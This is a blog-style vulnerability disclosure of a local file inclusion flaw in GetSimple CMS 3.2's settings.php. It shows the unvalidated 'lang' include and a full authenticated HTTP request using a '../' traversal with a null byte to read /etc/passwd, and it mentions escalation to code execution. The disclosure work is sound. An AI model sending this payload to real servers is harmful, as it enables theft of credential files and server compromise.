GetSimple CMS 3.2 LFI exploit

Following on my series of GetSimple CMS articles this one details a LFI (Local file inclusion) vulnerability which is present in current and current beta versions – 3.2beta.

As per the previous article this requires you to be logged in as a valid user.

The code at fault is in the settings.php page and is the language parameter, I have listed the section below:

if(isset($_POST[‘lang’])) {
$LANG = $_POST[‘lang’];

Then its used here
include(GSLANGPATH.$LANG.’.php’);

So for example if you post the following request, you will get the /etc/passwd file which given these days they contain no passwords is probably the least of your worries, more likely an attacker would be after other files with credentials in.

POST /admin/settings.php HTTP/1.1
Host: getsimplecmshost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://getsimplecmshost/admin/settings.php
Cookie: validcookie
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315

nonce=validnonce&sitename=GetSimpleCMSSite&siteurl=http%3A%2F%2Fgetsimplehost%2F&permalink=&user=admin&email=admin@domainname&timezone=Europe%2FLondon&lang=../../../../../../../../etc/passwd%00&show_htmleditor=1&sitepwd=&sitepwd_confirm=&submitted=Save+Settings

As I’ve mentioned in previous articles whilst this requires a valid user, its not acceptable that even an authenticated user can read files off the local file system – especially in the case of hosted systems.

In extreme circumstances this LFI can also lead to complete server compromise using a technique where php code is injected into files which are readable by the web process and subsequently included in the above request and executed.

Again simple user input validation would completely reduce this attack.

You can follow any responses to this entry through the RSS 2.0 feed.

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

This blog is kept spam free by WP-SpamFree.